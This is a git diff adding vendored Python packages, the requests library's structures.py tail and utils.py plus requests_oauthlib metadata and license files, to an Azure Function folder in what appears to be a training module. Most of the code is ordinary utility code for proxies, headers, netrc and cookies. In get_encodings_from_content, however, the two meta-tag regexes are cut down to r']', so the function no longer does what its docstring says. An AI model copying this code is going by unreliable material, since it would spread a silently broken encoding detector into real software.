+
+    def __delitem__(self, key):
+        del self._store[key.lower()]
+
+    def __iter__(self):
+        return (casedkey for casedkey, mappedvalue in self._store.values())
+
+    def __len__(self):
+        return len(self._store)
+
+    def lower_items(self):
+        """Like iteritems(), but with all lowercase keys."""
+        return ((lowerkey, keyval[1]) for (lowerkey, keyval) in self._store.items())
+
+    def __eq__(self, other):
+        if isinstance(other, Mapping):
+            other = CaseInsensitiveDict(other)
+        else:
+            return NotImplemented
+        # Compare insensitively
+        return dict(self.lower_items()) == dict(other.lower_items())
+
+    # Copy is required
+    def copy(self):
+        return CaseInsensitiveDict(self._store.values())
+
+    def __repr__(self):
+        return str(dict(self.items()))
+
+
+class LookupDict(dict):
+    """Dictionary lookup object."""
+
+    def __init__(self, name=None):
+        self.name = name
+        super().__init__()
+
+    def __repr__(self):
+        return f"<lookup '{self.name}'>"
+
+    def __getitem__(self, key):
+        # We allow fall-through here, so values default to None
+
+        return self.__dict__.get(key, None)
+
+    def get(self, key, default=None):
+        return self.__dict__.get(key, default)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py
new file mode 100644
index 0000000..498200f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/utils.py
@@ -0,0 +1,1086 @@
+"""
+requests.utils
+~~~~~~~~~~~~~~
+
+This module provides utility functions that are used within Requests
+that are also useful for external consumption.
+"""
+
+import codecs
+import contextlib
+import io
+import os
+import re
+import socket
+import struct
+import sys
+import tempfile
+import warnings
+import zipfile
+from collections import OrderedDict
+
+from urllib3.util import make_headers, parse_url
+
+from . import certs
+from .__version__ import __version__
+
+# to_native_string is unused here, but imported here for backwards compatibility
+from ._internal_utils import HEADER_VALIDATORS, to_native_string  # noqa: F401
+from .compat import (
+    Mapping,
+    basestring,
+    bytes,
+    getproxies,
+    getproxies_environment,
+    integer_types,
+)
+from .compat import parse_http_list as _parse_list_header
+from .compat import (
+    proxy_bypass,
+    proxy_bypass_environment,
+    quote,
+    str,
+    unquote,
+    urlparse,
+    urlunparse,
+)
+from .cookies import cookiejar_from_dict
+from .exceptions import (
+    FileModeWarning,
+    InvalidHeader,
+    InvalidURL,
+    UnrewindableBodyError,
+)
+from .structures import CaseInsensitiveDict
+
+NETRC_FILES = (".netrc", "_netrc")
+
+DEFAULT_CA_BUNDLE_PATH = certs.where()
+
+DEFAULT_PORTS = {"http": 80, "https": 443}
+
+# Ensure that ', ' is used to preserve previous delimiter behavior.
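+# (Illustrative, environment-dependent: with a typical urllib3 build this
+# evaluates to something like "gzip, deflate", with "br" appended when
+# Brotli support is available.)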
+DEFAULT_ACCEPT_ENCODING = ", ".join(
+    re.split(r",\s*", make_headers(accept_encoding=True)["accept-encoding"])
+)
+
+
+if sys.platform == "win32":
+    # provide a proxy_bypass version on Windows without DNS lookups
+
+    def proxy_bypass_registry(host):
+        try:
+            import winreg
+        except ImportError:
+            return False
+
+        try:
+            internetSettings = winreg.OpenKey(
+                winreg.HKEY_CURRENT_USER,
+                r"Software\Microsoft\Windows\CurrentVersion\Internet Settings",
+            )
+            # ProxyEnable could be REG_SZ or REG_DWORD, normalizing it
+            proxyEnable = int(winreg.QueryValueEx(internetSettings, "ProxyEnable")[0])
+            # ProxyOverride is almost always a string
+            proxyOverride = winreg.QueryValueEx(internetSettings, "ProxyOverride")[0]
+        except (OSError, ValueError):
+            return False
+        if not proxyEnable or not proxyOverride:
+            return False
+
+        # make a check value list from the registry entry: replace the
+        # '<local>' string by the localhost entry and the corresponding
+        # canonical entry.
+        proxyOverride = proxyOverride.split(";")
+        # now check if we match one of the registry values.
+        for test in proxyOverride:
+            if test == "<local>":
+                if "." not in host:
+                    return True
+            test = test.replace(".", r"\.")  # mask dots
+            test = test.replace("*", r".*")  # change glob sequence
+            test = test.replace("?", r".")  # change glob char
+            if re.match(test, host, re.I):
+                return True
+        return False
+
+    def proxy_bypass(host):  # noqa
+        """Return True, if the host should be bypassed.
+
+        Checks proxy settings gathered from the environment, if specified,
+        or the registry.
+        """
+        if getproxies_environment():
+            return proxy_bypass_environment(host)
+        else:
+            return proxy_bypass_registry(host)
+
+
+def dict_to_sequence(d):
+    """Returns an internal sequence dictionary update."""
+
+    if hasattr(d, "items"):
+        d = d.items()
+
+    return d
+
+
+def super_len(o):
+    total_length = None
+    current_position = 0
+
+    if hasattr(o, "__len__"):
+        total_length = len(o)
+
+    elif hasattr(o, "len"):
+        total_length = o.len
+
+    elif hasattr(o, "fileno"):
+        try:
+            fileno = o.fileno()
+        except (io.UnsupportedOperation, AttributeError):
+            # AttributeError is a surprising exception, seeing as how we've just checked
+            # that `hasattr(o, 'fileno')`. It happens for objects obtained via
+            # `Tarfile.extractfile()`, per issue 5229.
+            pass
+        else:
+            total_length = os.fstat(fileno).st_size
+
+            # Having used fstat to determine the file length, we need to
+            # confirm that this file was opened up in binary mode.
+            if "b" not in o.mode:
+                warnings.warn(
+                    (
+                        "Requests has determined the content-length for this "
+                        "request using the binary size of the file: however, the "
+                        "file has been opened in text mode (i.e. without the 'b' "
+                        "flag in the mode). This may lead to an incorrect "
+                        "content-length. In Requests 3.0, support will be removed "
+                        "for files in text mode."
+                    ),
+                    FileModeWarning,
+                )
+
+    if hasattr(o, "tell"):
+        try:
+            current_position = o.tell()
+        except OSError:
+            # This can happen in some weird situations, such as when the file
+            # is actually a special file descriptor like stdin. In this
+            # instance, we don't know what the length is, so set it to zero and
+            # let requests chunk it instead.
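+            # A worked example (not part of the vendored source): for a
+            # partially-read BytesIO, super_len reports the remaining bytes:
+            #   b = io.BytesIO(b"abcdef"); b.read(2); super_len(b)  # -> 4
+            # because tell() is 2 and seek(0, 2) finds a total length of 6.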
+ if total_length is not None: + current_position = total_length + else: + if hasattr(o, "seek") and total_length is None: + # StringIO and BytesIO have seek but no usable fileno + try: + # seek to end of file + o.seek(0, 2) + total_length = o.tell() + + # seek back to current position to support + # partially read file-like objects + o.seek(current_position or 0) + except OSError: + total_length = 0 + + if total_length is None: + total_length = 0 + + return max(0, total_length - current_position) + + +def get_netrc_auth(url, raise_errors=False): + """Returns the Requests tuple auth for a given url from netrc.""" + + netrc_file = os.environ.get("NETRC") + if netrc_file is not None: + netrc_locations = (netrc_file,) + else: + netrc_locations = (f"~/{f}" for f in NETRC_FILES) + + try: + from netrc import NetrcParseError, netrc + + netrc_path = None + + for f in netrc_locations: + try: + loc = os.path.expanduser(f) + except KeyError: + # os.path.expanduser can fail when $HOME is undefined and + # getpwuid fails. See https://bugs.python.org/issue20164 & + # https://github.com/psf/requests/issues/1846 + return + + if os.path.exists(loc): + netrc_path = loc + break + + # Abort early if there isn't one. + if netrc_path is None: + return + + ri = urlparse(url) + + # Strip port numbers from netloc. This weird `if...encode`` dance is + # used for Python 3.2, which doesn't support unicode literals. + splitstr = b":" + if isinstance(url, str): + splitstr = splitstr.decode("ascii") + host = ri.netloc.split(splitstr)[0] + + try: + _netrc = netrc(netrc_path).authenticators(host) + if _netrc: + # Return with login / password + login_i = 0 if _netrc[0] else 1 + return (_netrc[login_i], _netrc[2]) + except (NetrcParseError, OSError): + # If there was a parsing error or a permissions issue reading the file, + # we'll just skip netrc auth unless explicitly asked to raise errors. + if raise_errors: + raise + + # App Engine hackiness. + except (ImportError, AttributeError): + pass + + +def guess_filename(obj): + """Tries to guess the filename of the given object.""" + name = getattr(obj, "name", None) + if name and isinstance(name, basestring) and name[0] != "<" and name[-1] != ">": + return os.path.basename(name) + + +def extract_zipped_paths(path): + """Replace nonexistent paths that look like they refer to a member of a zip + archive with the location of an extracted copy of the target, or else + just return the provided path unchanged. 
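+
+    A hypothetical example: given "/tmp/bundle.zip/certs/ca.pem" where only
+    "/tmp/bundle.zip" exists on disk, the member "certs/ca.pem" is extracted
+    to a temporary directory and the extracted file's path is returned.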
+ """ + if os.path.exists(path): + # this is already a valid path, no need to do anything further + return path + + # find the first valid part of the provided path and treat that as a zip archive + # assume the rest of the path is the name of a member in the archive + archive, member = os.path.split(path) + while archive and not os.path.exists(archive): + archive, prefix = os.path.split(archive) + if not prefix: + # If we don't check for an empty prefix after the split (in other words, archive remains unchanged after the split), + # we _can_ end up in an infinite loop on a rare corner case affecting a small number of users + break + member = "/".join([prefix, member]) + + if not zipfile.is_zipfile(archive): + return path + + zip_file = zipfile.ZipFile(archive) + if member not in zip_file.namelist(): + return path + + # we have a valid zip archive and a valid member of that archive + tmp = tempfile.gettempdir() + extracted_path = os.path.join(tmp, member.split("/")[-1]) + if not os.path.exists(extracted_path): + # use read + write to avoid the creating nested folders, we only want the file, avoids mkdir racing condition + with atomic_open(extracted_path) as file_handler: + file_handler.write(zip_file.read(member)) + return extracted_path + + +@contextlib.contextmanager +def atomic_open(filename): + """Write a file to the disk in an atomic fashion""" + tmp_descriptor, tmp_name = tempfile.mkstemp(dir=os.path.dirname(filename)) + try: + with os.fdopen(tmp_descriptor, "wb") as tmp_handler: + yield tmp_handler + os.replace(tmp_name, filename) + except BaseException: + os.remove(tmp_name) + raise + + +def from_key_val_list(value): + """Take an object and test to see if it can be represented as a + dictionary. Unless it can not be represented as such, return an + OrderedDict, e.g., + + :: + + >>> from_key_val_list([('key', 'val')]) + OrderedDict([('key', 'val')]) + >>> from_key_val_list('string') + Traceback (most recent call last): + ... + ValueError: cannot encode objects that are not 2-tuples + >>> from_key_val_list({'key': 'val'}) + OrderedDict([('key', 'val')]) + + :rtype: OrderedDict + """ + if value is None: + return None + + if isinstance(value, (str, bytes, bool, int)): + raise ValueError("cannot encode objects that are not 2-tuples") + + return OrderedDict(value) + + +def to_key_val_list(value): + """Take an object and test to see if it can be represented as a + dictionary. If it can be, return a list of tuples, e.g., + + :: + + >>> to_key_val_list([('key', 'val')]) + [('key', 'val')] + >>> to_key_val_list({'key': 'val'}) + [('key', 'val')] + >>> to_key_val_list('string') + Traceback (most recent call last): + ... + ValueError: cannot encode objects that are not 2-tuples + + :rtype: list + """ + if value is None: + return None + + if isinstance(value, (str, bytes, bool, int)): + raise ValueError("cannot encode objects that are not 2-tuples") + + if isinstance(value, Mapping): + value = value.items() + + return list(value) + + +# From mitsuhiko/werkzeug (used with permission). +def parse_list_header(value): + """Parse lists as described by RFC 2068 Section 2. + + In particular, parse comma-separated lists where the elements of + the list may include quoted-strings. A quoted-string could + contain a comma. A non-quoted string could have quotes in the + middle. Quotes are removed automatically after parsing. + + It basically works like :func:`parse_set_header` just that items + may appear multiple times and case sensitivity is preserved. 
+ + The return value is a standard :class:`list`: + + >>> parse_list_header('token, "quoted value"') + ['token', 'quoted value'] + + To create a header from the :class:`list` again, use the + :func:`dump_header` function. + + :param value: a string with a list header. + :return: :class:`list` + :rtype: list + """ + result = [] + for item in _parse_list_header(value): + if item[:1] == item[-1:] == '"': + item = unquote_header_value(item[1:-1]) + result.append(item) + return result + + +# From mitsuhiko/werkzeug (used with permission). +def parse_dict_header(value): + """Parse lists of key, value pairs as described by RFC 2068 Section 2 and + convert them into a python dict: + + >>> d = parse_dict_header('foo="is a fish", bar="as well"') + >>> type(d) is dict + True + >>> sorted(d.items()) + [('bar', 'as well'), ('foo', 'is a fish')] + + If there is no value for a key it will be `None`: + + >>> parse_dict_header('key_without_value') + {'key_without_value': None} + + To create a header from the :class:`dict` again, use the + :func:`dump_header` function. + + :param value: a string with a dict header. + :return: :class:`dict` + :rtype: dict + """ + result = {} + for item in _parse_list_header(value): + if "=" not in item: + result[item] = None + continue + name, value = item.split("=", 1) + if value[:1] == value[-1:] == '"': + value = unquote_header_value(value[1:-1]) + result[name] = value + return result + + +# From mitsuhiko/werkzeug (used with permission). +def unquote_header_value(value, is_filename=False): + r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). + This does not use the real unquoting but what browsers are actually + using for quoting. + + :param value: the header value to unquote. + :rtype: str + """ + if value and value[0] == value[-1] == '"': + # this is not the real unquoting, but fixing this so that the + # RFC is met will result in bugs with internet explorer and + # probably some other browsers as well. IE for example is + # uploading files with "C:\foo\bar.txt" as filename + value = value[1:-1] + + # if this is a filename and the starting characters look like + # a UNC path, then just return the value without quotes. Using the + # replace sequence below on a UNC path has the effect of turning + # the leading double slash into a single slash and then + # _fix_ie_filename() doesn't work correctly. See #458. + if not is_filename or value[:2] != "\\\\": + return value.replace("\\\\", "\\").replace('\\"', '"') + return value + + +def dict_from_cookiejar(cj): + """Returns a key/value dictionary from a CookieJar. + + :param cj: CookieJar object to extract cookies from. + :rtype: dict + """ + + cookie_dict = {} + + for cookie in cj: + cookie_dict[cookie.name] = cookie.value + + return cookie_dict + + +def add_dict_to_cookiejar(cj, cookie_dict): + """Returns a CookieJar from a key/value dictionary. + + :param cj: CookieJar to insert cookies into. + :param cookie_dict: Dict of key/values to insert into CookieJar. + :rtype: CookieJar + """ + + return cookiejar_from_dict(cookie_dict, cj) + + +def get_encodings_from_content(content): + """Returns encodings from given content string. + + :param content: bytestring to extract encodings from. + """ + warnings.warn( + ( + "In requests 3.0, get_encodings_from_content will be removed. For " + "more information, please see the discussion on issue #2266. 
(This" + " warning should only appear once.)" + ), + DeprecationWarning, + ) + + charset_re = re.compile(r']', flags=re.I) + pragma_re = re.compile(r']', flags=re.I) + xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]') + + return ( + charset_re.findall(content) + + pragma_re.findall(content) + + xml_re.findall(content) + ) + + +def _parse_content_type_header(header): + """Returns content type and parameters from given header + + :param header: string + :return: tuple containing content type and dictionary of + parameters + """ + + tokens = header.split(";") + content_type, params = tokens[0].strip(), tokens[1:] + params_dict = {} + items_to_strip = "\"' " + + for param in params: + param = param.strip() + if param: + key, value = param, True + index_of_equals = param.find("=") + if index_of_equals != -1: + key = param[:index_of_equals].strip(items_to_strip) + value = param[index_of_equals + 1 :].strip(items_to_strip) + params_dict[key.lower()] = value + return content_type, params_dict + + +def get_encoding_from_headers(headers): + """Returns encodings from given HTTP Header Dict. + + :param headers: dictionary to extract encoding from. + :rtype: str + """ + + content_type = headers.get("content-type") + + if not content_type: + return None + + content_type, params = _parse_content_type_header(content_type) + + if "charset" in params: + return params["charset"].strip("'\"") + + if "text" in content_type: + return "ISO-8859-1" + + if "application/json" in content_type: + # Assume UTF-8 based on RFC 4627: https://www.ietf.org/rfc/rfc4627.txt since the charset was unset + return "utf-8" + + +def stream_decode_response_unicode(iterator, r): + """Stream decodes an iterator.""" + + if r.encoding is None: + yield from iterator + return + + decoder = codecs.getincrementaldecoder(r.encoding)(errors="replace") + for chunk in iterator: + rv = decoder.decode(chunk) + if rv: + yield rv + rv = decoder.decode(b"", final=True) + if rv: + yield rv + + +def iter_slices(string, slice_length): + """Iterate over slices of a string.""" + pos = 0 + if slice_length is None or slice_length <= 0: + slice_length = len(string) + while pos < len(string): + yield string[pos : pos + slice_length] + pos += slice_length + + +def get_unicode_from_response(r): + """Returns the requested content back in unicode. + + :param r: Response object to get unicode content from. + + Tried: + + 1. charset from content-type + 2. fall back and replace all unicode characters + + :rtype: str + """ + warnings.warn( + ( + "In requests 3.0, get_unicode_from_response will be removed. For " + "more information, please see the discussion on issue #2266. (This" + " warning should only appear once.)" + ), + DeprecationWarning, + ) + + tried_encodings = [] + + # Try charset from content-type + encoding = get_encoding_from_headers(r.headers) + + if encoding: + try: + return str(r.content, encoding) + except UnicodeError: + tried_encodings.append(encoding) + + # Fall back: + try: + return str(r.content, encoding, errors="replace") + except TypeError: + return r.content + + +# The unreserved URI characters (RFC 3986) +UNRESERVED_SET = frozenset( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~" +) + + +def unquote_unreserved(uri): + """Un-escape any percent-escape sequences in a URI that are unreserved + characters. This leaves all reserved, illegal and non-ASCII bytes encoded. 
+ + :rtype: str + """ + parts = uri.split("%") + for i in range(1, len(parts)): + h = parts[i][0:2] + if len(h) == 2 and h.isalnum(): + try: + c = chr(int(h, 16)) + except ValueError: + raise InvalidURL(f"Invalid percent-escape sequence: '{h}'") + + if c in UNRESERVED_SET: + parts[i] = c + parts[i][2:] + else: + parts[i] = f"%{parts[i]}" + else: + parts[i] = f"%{parts[i]}" + return "".join(parts) + + +def requote_uri(uri): + """Re-quote the given URI. + + This function passes the given URI through an unquote/quote cycle to + ensure that it is fully and consistently quoted. + + :rtype: str + """ + safe_with_percent = "!#$%&'()*+,/:;=?@[]~" + safe_without_percent = "!#$&'()*+,/:;=?@[]~" + try: + # Unquote only the unreserved characters + # Then quote only illegal characters (do not quote reserved, + # unreserved, or '%') + return quote(unquote_unreserved(uri), safe=safe_with_percent) + except InvalidURL: + # We couldn't unquote the given URI, so let's try quoting it, but + # there may be unquoted '%'s in the URI. We need to make sure they're + # properly quoted so they do not cause issues elsewhere. + return quote(uri, safe=safe_without_percent) + + +def address_in_network(ip, net): + """This function allows you to check if an IP belongs to a network subnet + + Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24 + returns False if ip = 192.168.1.1 and net = 192.168.100.0/24 + + :rtype: bool + """ + ipaddr = struct.unpack("=L", socket.inet_aton(ip))[0] + netaddr, bits = net.split("/") + netmask = struct.unpack("=L", socket.inet_aton(dotted_netmask(int(bits))))[0] + network = struct.unpack("=L", socket.inet_aton(netaddr))[0] & netmask + return (ipaddr & netmask) == (network & netmask) + + +def dotted_netmask(mask): + """Converts mask from /xx format to xxx.xxx.xxx.xxx + + Example: if mask is 24 function returns 255.255.255.0 + + :rtype: str + """ + bits = 0xFFFFFFFF ^ (1 << 32 - mask) - 1 + return socket.inet_ntoa(struct.pack(">I", bits)) + + +def is_ipv4_address(string_ip): + """ + :rtype: bool + """ + try: + socket.inet_aton(string_ip) + except OSError: + return False + return True + + +def is_valid_cidr(string_network): + """ + Very simple check of the cidr format in no_proxy variable. + + :rtype: bool + """ + if string_network.count("/") == 1: + try: + mask = int(string_network.split("/")[1]) + except ValueError: + return False + + if mask < 1 or mask > 32: + return False + + try: + socket.inet_aton(string_network.split("/")[0]) + except OSError: + return False + else: + return False + return True + + +@contextlib.contextmanager +def set_environ(env_name, value): + """Set the environment variable 'env_name' to 'value' + + Save previous value, yield, and then restore the previous value stored in + the environment variable 'env_name'. + + If 'value' is None, do nothing""" + value_changed = value is not None + if value_changed: + old_value = os.environ.get(env_name) + os.environ[env_name] = value + try: + yield + finally: + if value_changed: + if old_value is None: + del os.environ[env_name] + else: + os.environ[env_name] = old_value + + +def should_bypass_proxies(url, no_proxy): + """ + Returns whether we should bypass proxies or not. + + :rtype: bool + """ + # Prioritize lowercase environment variables over uppercase + # to keep a consistent behaviour with other http projects (curl, wget). + def get_proxy(key): + return os.environ.get(key) or os.environ.get(key.upper()) + + # First check whether no_proxy is defined. 
If it is, check that the URL
+    # we're getting isn't in the no_proxy list.
+    no_proxy_arg = no_proxy
+    if no_proxy is None:
+        no_proxy = get_proxy("no_proxy")
+    parsed = urlparse(url)
+
+    if parsed.hostname is None:
+        # URLs don't always have hostnames, e.g. file:/// urls.
+        return True
+
+    if no_proxy:
+        # We need to check whether we match here. We need to see if we match
+        # the end of the hostname, both with and without the port.
+        no_proxy = (host for host in no_proxy.replace(" ", "").split(",") if host)
+
+        if is_ipv4_address(parsed.hostname):
+            for proxy_ip in no_proxy:
+                if is_valid_cidr(proxy_ip):
+                    if address_in_network(parsed.hostname, proxy_ip):
+                        return True
+                elif parsed.hostname == proxy_ip:
+                    # If no_proxy ip was defined in plain IP notation instead of cidr notation &
+                    # matches the IP of the index
+                    return True
+        else:
+            host_with_port = parsed.hostname
+            if parsed.port:
+                host_with_port += f":{parsed.port}"
+
+            for host in no_proxy:
+                if parsed.hostname.endswith(host) or host_with_port.endswith(host):
+                    # The URL does match something in no_proxy, so we don't want
+                    # to apply the proxies on this URL.
+                    return True
+
+    with set_environ("no_proxy", no_proxy_arg):
+        # parsed.hostname can be `None` in cases such as a file URI.
+        try:
+            bypass = proxy_bypass(parsed.hostname)
+        except (TypeError, socket.gaierror):
+            bypass = False
+
+        if bypass:
+            return True
+
+    return False
+
+
+def get_environ_proxies(url, no_proxy=None):
+    """
+    Return a dict of environment proxies.
+
+    :rtype: dict
+    """
+    if should_bypass_proxies(url, no_proxy=no_proxy):
+        return {}
+    else:
+        return getproxies()
+
+
+def select_proxy(url, proxies):
+    """Select a proxy for the url, if applicable.
+
+    :param url: The url of the request
+    :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs
+    """
+    proxies = proxies or {}
+    urlparts = urlparse(url)
+    if urlparts.hostname is None:
+        return proxies.get(urlparts.scheme, proxies.get("all"))
+
+    proxy_keys = [
+        urlparts.scheme + "://" + urlparts.hostname,
+        urlparts.scheme,
+        "all://" + urlparts.hostname,
+        "all",
+    ]
+    proxy = None
+    for proxy_key in proxy_keys:
+        if proxy_key in proxies:
+            proxy = proxies[proxy_key]
+            break
+
+    return proxy
+
+
+def resolve_proxies(request, proxies, trust_env=True):
+    """This method takes proxy information from a request and configuration
+    input to resolve a mapping of target proxies. This will consider settings
+    such as NO_PROXY to strip proxy configurations.
+
+    :param request: Request or PreparedRequest
+    :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs
+    :param trust_env: Boolean declaring whether to trust environment configs
+
+    :rtype: dict
+    """
+    proxies = proxies if proxies is not None else {}
+    url = request.url
+    scheme = urlparse(url).scheme
+    no_proxy = proxies.get("no_proxy")
+    new_proxies = proxies.copy()
+
+    if trust_env and not should_bypass_proxies(url, no_proxy=no_proxy):
+        environ_proxies = get_environ_proxies(url, no_proxy=no_proxy)
+
+        proxy = environ_proxies.get(scheme, environ_proxies.get("all"))
+
+        if proxy:
+            new_proxies.setdefault(scheme, proxy)
+    return new_proxies
+
+
+def default_user_agent(name="python-requests"):
+    """
+    Return a string representing the default user agent.
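+
+    For example (illustrative only; the exact version string depends on the
+    installed requests release): ``default_user_agent()`` ->
+    ``'python-requests/2.28.1'``.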
+
+    :rtype: str
+    """
+    return f"{name}/{__version__}"
+
+
+def default_headers():
+    """
+    :rtype: requests.structures.CaseInsensitiveDict
+    """
+    return CaseInsensitiveDict(
+        {
+            "User-Agent": default_user_agent(),
+            "Accept-Encoding": DEFAULT_ACCEPT_ENCODING,
+            "Accept": "*/*",
+            "Connection": "keep-alive",
+        }
+    )
+
+
+def parse_header_links(value):
+    """Return a list of parsed link headers.
+
+    i.e. Link: <http://.../front.jpeg>; rel=front; type="image/jpeg",<http://.../back.jpeg>; rel=back;type="image/jpeg"
+
+    :rtype: list
+    """
+
+    links = []
+
+    replace_chars = " '\""
+
+    value = value.strip(replace_chars)
+    if not value:
+        return links
+
+    for val in re.split(", *<", value):
+        try:
+            url, params = val.split(";", 1)
+        except ValueError:
+            url, params = val, ""
+
+        link = {"url": url.strip("<> '\"")}
+
+        for param in params.split(";"):
+            try:
+                key, value = param.split("=")
+            except ValueError:
+                break
+
+            link[key.strip(replace_chars)] = value.strip(replace_chars)
+
+        links.append(link)
+
+    return links
+
+
+# Null bytes; no need to recreate these on each call to guess_json_utf
+_null = "\x00".encode("ascii")  # encoding to ASCII for Python 3
+_null2 = _null * 2
+_null3 = _null * 3
+
+
+def guess_json_utf(data):
+    """
+    :rtype: str
+    """
+    # JSON always starts with two ASCII characters, so detection is as
+    # easy as counting the nulls and from their location and count
+    # determine the encoding. Also detect a BOM, if present.
+    sample = data[:4]
+    if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE):
+        return "utf-32"  # BOM included
+    if sample[:3] == codecs.BOM_UTF8:
+        return "utf-8-sig"  # BOM included, MS style (discouraged)
+    if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
+        return "utf-16"  # BOM included
+    nullcount = sample.count(_null)
+    if nullcount == 0:
+        return "utf-8"
+    if nullcount == 2:
+        if sample[::2] == _null2:  # 1st and 3rd are null
+            return "utf-16-be"
+        if sample[1::2] == _null2:  # 2nd and 4th are null
+            return "utf-16-le"
+        # Did not detect 2 valid UTF-16 ascii-range characters
+    if nullcount == 3:
+        if sample[:3] == _null3:
+            return "utf-32-be"
+        if sample[1:] == _null3:
+            return "utf-32-le"
+        # Did not detect a valid UTF-32 ascii-range character
+    return None
+
+
+def prepend_scheme_if_needed(url, new_scheme):
+    """Given a URL that may or may not have a scheme, prepend the given scheme.
+    Does not replace a present scheme with the one provided as an argument.
+
+    :rtype: str
+    """
+    parsed = parse_url(url)
+    scheme, auth, host, port, path, query, fragment = parsed
+
+    # A defect in urlparse determines that there isn't a netloc present in some
+    # urls. We previously assumed parsing was overly cautious, and swapped the
+    # netloc and path. Due to a lack of tests on the original defect, this is
+    # maintained with parse_url for backwards compatibility.
+    netloc = parsed.netloc
+    if not netloc:
+        netloc, path = path, netloc
+
+    if auth:
+        # parse_url doesn't provide the netloc with auth
+        # so we'll add it ourselves.
+        netloc = "@".join([auth, netloc])
+    if scheme is None:
+        scheme = new_scheme
+    if path is None:
+        path = ""
+
+    return urlunparse((scheme, netloc, path, "", query, fragment))
+
+
+def get_auth_from_url(url):
+    """Given a url with authentication components, extract them into a tuple of
+    username,password.
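+
+    Illustrative example (an added doctest-style note; the credentials are
+    made up, and the percent-encoded password is decoded by ``unquote``):
+
+    >>> get_auth_from_url('https://user:p%40ss@example.com/path')
+    ('user', 'p@ss')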
+
+    :rtype: (str,str)
+    """
+    parsed = urlparse(url)
+
+    try:
+        auth = (unquote(parsed.username), unquote(parsed.password))
+    except (AttributeError, TypeError):
+        auth = ("", "")
+
+    return auth
+
+
+def check_header_validity(header):
+    """Verifies that header parts don't contain leading whitespace,
+    reserved characters, or return characters.
+
+    :param header: tuple, in the format (name, value).
+    """
+    name, value = header
+
+    for part in header:
+        if type(part) not in HEADER_VALIDATORS:
+            raise InvalidHeader(
+                f"Header part ({part!r}) from {{{name!r}: {value!r}}} must be "
+                f"of type str or bytes, not {type(part)}"
+            )
+
+    _validate_header_part(name, "name", HEADER_VALIDATORS[type(name)][0])
+    _validate_header_part(value, "value", HEADER_VALIDATORS[type(value)][1])
+
+
+def _validate_header_part(header_part, header_kind, validator):
+    if not validator.match(header_part):
+        raise InvalidHeader(
+            f"Invalid leading whitespace, reserved character(s), or return "
+            f"character(s) in header {header_kind}: {header_part!r}"
+        )
+
+
+def urldefragauth(url):
+    """
+    Given a url remove the fragment and the authentication part.
+
+    :rtype: str
+    """
+    scheme, netloc, path, params, query, fragment = urlparse(url)
+
+    # see func:`prepend_scheme_if_needed`
+    if not netloc:
+        netloc, path = path, netloc
+
+    netloc = netloc.rsplit("@", 1)[-1]
+
+    return urlunparse((scheme, netloc, path, params, query, ""))
+
+
+def rewind_body(prepared_request):
+    """Move file pointer back to its recorded starting position
+    so it can be read again on redirect.
+    """
+    body_seek = getattr(prepared_request.body, "seek", None)
+    if body_seek is not None and isinstance(
+        prepared_request._body_position, integer_types
+    ):
+        try:
+            body_seek(prepared_request._body_position)
+        except OSError:
+            raise UnrewindableBodyError(
+                "An error occurred when rewinding request body for redirect."
+            )
+    else:
+        raise UnrewindableBodyError("Unable to rewind request body for redirect.")
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER
new file mode 100644
index 0000000..4660be2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER
@@ -0,0 +1 @@
+pip
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE
new file mode 100644
index 0000000..7fff981
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE
@@ -0,0 +1,15 @@
+ISC License
+
+Copyright (c) 2014 Kenneth Reitz.
+
+Permission to use, copy, modify, and/or distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA
new file mode 100644
index 0000000..dcc7c91
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA
@@ -0,0 +1,245 @@
+Metadata-Version: 2.1
+Name: requests-oauthlib
+Version: 1.3.1
+Summary: OAuthlib authentication support for Requests.
+Home-page: https://github.com/requests/requests-oauthlib
+Author: Kenneth Reitz
+Author-email: me@kennethreitz.com
+License: ISC
+Platform: UNKNOWN
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Intended Audience :: Developers
+Classifier: Natural Language :: English
+Classifier: License :: OSI Approved :: BSD License
+Classifier: Programming Language :: Python
